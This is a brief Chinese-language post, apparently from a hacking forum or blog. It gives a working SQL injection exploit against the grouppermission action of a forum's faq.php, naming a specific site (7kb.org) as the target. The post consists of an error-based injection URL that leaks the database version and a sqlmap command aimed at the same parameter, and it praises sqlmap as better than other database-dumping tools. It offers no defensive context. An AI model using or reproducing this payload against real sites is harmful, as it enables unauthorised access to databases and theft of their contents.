老漏洞 不做详细介绍

 

sqlmap比起网上的脱库工具更灵活 更可靠 更稳定 有效率

 

exp

http://7kb.org/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23

sqlmap 构造为

sqlmap.py -u "http://www.7kb.org/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)" --technique=E -p gids[100][0]